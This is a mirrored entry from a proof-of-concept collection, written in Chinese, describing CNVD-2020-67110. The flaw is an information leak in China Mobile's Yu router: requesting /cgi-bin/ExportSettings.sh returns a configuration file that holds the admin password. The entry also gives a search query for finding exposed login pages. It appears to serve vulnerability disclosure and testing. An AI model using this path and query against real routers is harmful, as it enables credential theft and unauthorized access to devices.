admin/Awesome-POC

mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-07 20:06:03 +00:00

Threekiii 11de4c1d47 update

2024-11-06 14:10:36 +08:00

565 B

Raw Blame History

中国移动禹路由 ExportSettings.sh 敏感信息泄露漏洞 CNVD-2020-67110

漏洞描述

中国移动禹路由 ExportSettings.sh 存在敏感信息泄露漏洞，攻击者通过漏洞获取配置文件，其中包含账号密码等敏感信息

漏洞影响

中国移动 禹路由

网络测绘

title="互联世界 物联未来-登录"

漏洞复现

登录页面如下

访问Url

/cgi-bin/ExportSettings.sh

其中password为登录后台密码